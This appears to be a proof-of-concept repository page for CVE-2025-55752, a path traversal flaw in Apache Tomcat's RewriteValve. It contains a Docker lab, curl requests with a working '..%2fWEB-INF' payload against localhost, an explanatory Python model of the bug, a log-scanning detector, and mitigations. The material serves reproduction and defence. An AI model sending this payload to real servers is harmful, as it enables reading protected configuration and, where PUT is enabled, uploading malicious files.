
CVE-2025-55752 PoC — Apache Tomcat: Directory traversal via rewrite with possible RCE if PUT is enabled

Associated Vulnerability
Title: Apache Tomcat: Directory traversal via rewrite with possible RCE if PUT is enabled (CVE-2025-55752)
Description: Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.
Readme
# CVE-2025-55752: Apache Tomcat Path Traversal Vulnerability

Docker-based reproduction environment for CVE-2025-55752, a path traversal vulnerability in Apache Tomcat 10.1.44.

## Overview

CVE-2025-55752 is a path traversal vulnerability in Apache Tomcat's RewriteValve caused by an incorrect processing
order: **URL normalization occurs before URL decoding**. This allows attackers to bypass security constraints
protecting directories like `/WEB-INF/` using URL-encoded path traversal sequences (`..%2f`).

### Vulnerability Characteristics

- **CVE ID**: CVE-2025-55752
- **CVSS v3.1**: 7.5 (HIGH)
- **CWE**: CWE-22 (Path Traversal)
- **Component**: Apache Tomcat RewriteValve
- **Root Cause**: Normalize-before-decode processing order

## Affected Versions

| Series | Vulnerable Versions | Patched Version |
|--------|-------------------|-----------------|
| 11.x | 11.0.0-M1 to 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 to 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 to 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 to 8.5.100 | EOL - No patch |

## Quick Start

```bash
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
```

## Vulnerability Testing

### Test 1: Direct WEB-INF Access (Protected)

```bash
curl -I 'http://localhost:8080/WEB-INF/web.xml'
```

**Expected**: `403 Forbidden`

### Test 2: Information Disclosure (Read Protected Files)

```bash
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
```

**Expected**: `200 OK` + web.xml content (vulnerability confirmed)


## How It Works

1. Request: `/download?path=..%2fWEB-INF%2fweb.xml`
2. RewriteValve rewrites to: `/files/..%2fWEB-INF%2fweb.xml`
3. **URL normalization** (before decode): `%2f` not recognized as `/`, `..` survives
4. **URL decoding**: `%2f` → `/` → `/files/../WEB-INF/web.xml`
5. Path resolution: `/WEB-INF/web.xml`

## Processing Order Issue

```
Correct:    Decode → Normalize → Security Check
Vulnerable: Normalize → Decode → Security Check ✗
```
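The two processing orders above, modelled in Python as an added example (this is not code from the PoC repository or from Tomcat). It follows the five steps in "How It Works": a simplified rewrite rule mapping `/download?path=X` to `/files/X`, a segment-based normalizer in which only a literal `/` separates segments, a single percent-decode, and a prefix check for `/WEB-INF/` and `/META-INF/`. The `normalize`, `rewrite`, `vulnerable_order` and `fixed_order` names and the `/files/` prefix are assumptions of the model, not Tomcat internals.

```python
# Added example (not the repository's or Tomcat's code): a minimal model of the
# normalize-before-decode ordering from the README beside the fixed order.
# The rewrite rule, prefixes and helper names below are simplifying assumptions.
from typing import Optional
from urllib.parse import unquote, urlsplit

PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")


def normalize(path: str) -> str:
    """Collapse '.' and '..' segments. Only a literal '/' separates segments,
    so an encoded '%2f' stays inside its segment and '..%2fWEB-INF' is one
    ordinary segment, not a parent reference."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def raw_query_param(query: str, name: str) -> Optional[str]:
    """Return the still-encoded value of a query parameter (no decoding)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def rewrite(request_uri: str) -> str:
    """Model of a rewrite rule that maps /download?path=X to /files/X, where X
    is substituted raw, as the README's step 2 shows."""
    parts = urlsplit(request_uri)
    if parts.path != "/download":
        return parts.path
    return "/files/" + (raw_query_param(parts.query, "path") or "")


def is_protected(path: str) -> bool:
    """Security constraint applied to the path as it looks at check time."""
    upper = path.upper()
    return any(upper.startswith(prefix) for prefix in PROTECTED_PREFIXES)


def vulnerable_order(request_uri: str) -> Optional[str]:
    """Normalize -> decode -> security check (affected versions).
    Returns the resource finally resolved, or None if the check blocked it."""
    rewritten = rewrite(request_uri)
    normalized = normalize(rewritten)   # '%2f' is not a slash yet: '..' survives
    decoded = unquote(normalized)       # now '/files/../WEB-INF/web.xml'
    if is_protected(decoded):           # prefix check sees '/files/...': passes
        return None
    return normalize(decoded)           # step 5: resolution collapses the '..'


def fixed_order(request_uri: str) -> Optional[str]:
    """Decode -> normalize -> security check (the order restored by the fix)."""
    rewritten = rewrite(request_uri)
    normalized = normalize(unquote(rewritten))
    if is_protected(normalized):
        return None
    return normalized


if __name__ == "__main__":
    for uri in ("/download?path=report.txt",
                "/download?path=../WEB-INF/web.xml",
                "/download?path=..%2fWEB-INF%2fweb.xml",
                "/WEB-INF/web.xml"):
        print(f"{uri:45} vulnerable -> {vulnerable_order(uri)!s:20} fixed -> {fixed_order(uri)}")
```

Running it shows that a literal `../` is caught in both orders because normalization sees the `..` segment, while the encoded `..%2f` form only becomes a parent reference after the decode, which in the vulnerable order happens after the check has already passed.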

## Tomcat Fix

- **GitHub**: [apache/tomcat commit 130d36d8](https://github.com/apache/tomcat/commit/130d36d8)
- **Fix**: Decode before normalize

## Mitigation

1. Disable RewriteValve if not required
2. Disable PUT method
3. WAF rules to block `../` and `%2e%2e`
4. Upgrade to patched versions (10.1.45+, 9.0.109+, 11.0.11+)
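A detection check for mitigation 3, added here as an example and not taken from the repository. A rule that matches only the literal `../` and `%2e%2e` forms does not match the `..%2f` request shown in Test 2 (it contains neither string), so the scanner below percent-decodes the request target first and then looks for `..` followed by a separator, or for a `/WEB-INF/` or `/META-INF/` reference; it also notes when the method is PUT, which is the condition under which the advisory describes the upload path. The log lines are constructed samples in Tomcat's default AccessLogValve "common" layout; hosts, timestamps and sizes are invented.

```python
# Added example (not the repository's code): scan Tomcat-style access log lines
# for encoded traversal aimed at protected directories. All log lines below are
# constructed samples, not real traffic.
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                        # '..' + separator
PROTECTED_RE = re.compile(r'/(?:WEB-INF|META-INF)(?:/|$)', re.IGNORECASE)

# Constructed sample lines: one benign download, the Test 2 request, a direct
# probe that was refused, and a PUT carrying the same encoded traversal.
LOG_LINES = """\
10.0.0.5 - - [01/Jan/2025:12:00:00 +0000] "GET /download?path=report.txt HTTP/1.1" 200 1840
10.0.0.5 - - [01/Jan/2025:12:00:01 +0000] "GET /download?path=..%2fWEB-INF%2fweb.xml HTTP/1.1" 200 1400
10.0.0.5 - - [01/Jan/2025:12:00:03 +0000] "GET /WEB-INF/web.xml HTTP/1.1" 403 -
10.0.0.5 - - [01/Jan/2025:12:00:04 +0000] "PUT /download?path=..%2fupload.txt HTTP/1.1" 201 -
""".splitlines()


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so a rule is not defeated by
    applying another layer of encoding on top of the one Tomcat removes."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            return decoded
        target = decoded
    return target


def naive_match(target: str) -> bool:
    """A rule that only matches the two literal forms named in the README."""
    lower = target.lower()
    return "../" in lower or "%2e%2e" in lower


def decoded_match(target: str) -> bool:
    """Decode first, then look for a traversal step or a protected directory."""
    decoded = fully_decode(target)
    return bool(TRAVERSAL_RE.search(decoded) or PROTECTED_RE.search(decoded))


def scan(lines):
    """Return one finding per suspicious line with the reasons it was flagged."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                # skip lines in another layout
        target = m.group("target")
        decoded = fully_decode(target)
        reasons = []
        if TRAVERSAL_RE.search(decoded):
            reasons.append("traversal")
        if PROTECTED_RE.search(decoded):
            reasons.append("protected-dir")
        if not reasons:
            continue
        if m.group("method").upper() == "PUT":
            reasons.append("put-method")            # write path: highest priority
        findings.append({
            "host": m.group("host"),
            "method": m.group("method"),
            "target": target,
            "status": m.group("status"),
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"{f['host']} {f['method']} {f['target']} -> {f['status']} {f['reasons']}")
```

Treat a flagged request that received `200` (or `201` for a PUT) on an unpatched version as a confirmed read or write, not just an attempt; the `403` on the direct `/WEB-INF/` probe is the expected behaviour from Test 1 and is reported only so the probing host is visible.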

## References

- [Apache Tomcat Security](https://tomcat.apache.org/security.html)
- [NVD - CVE-2025-55752](https://nvd.nist.gov/vuln/detail/CVE-2025-55752)
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [CWE-22: Improper Limitation of a Pathname](https://cwe.mitre.org/data/definitions/22.html)

## Disclaimer

⚠️ **WARNING**: Do NOT deploy to production. Use only in isolated test environments.
File Snapshot

```
[4.0K] /data/pocs/891dee605d87c9a4b227e689fd9083d1f5b24c8b
├── [4.0K] docker
│   ├── [ 397] Dockerfile
│   ├── [4.0K] scripts
│   │   ├── [8.3K] exploit.py
│   │   └── [4.1K] test_vulnerability.sh
│   └── [4.0K] tomcat
│       ├── [4.0K] conf
│       │   ├── [ 210] context.xml
│       │   ├── [ 115] rewrite.config
│       │   └── [1.8K] server.xml
│       └── [4.0K] webapps
│           └── [4.0K] ROOT
│               ├── [4.0K] files
│               │   └── [1.8K] web.xml
│               ├── [3.8K] handler.jsp
│               ├── [3.6K] index.jsp
│               └── [4.0K] WEB-INF
│                   └── [1.4K] web.xml
├── [ 391] docker-compose.yml
└── [2.8K] README.md

9 directories, 12 files
```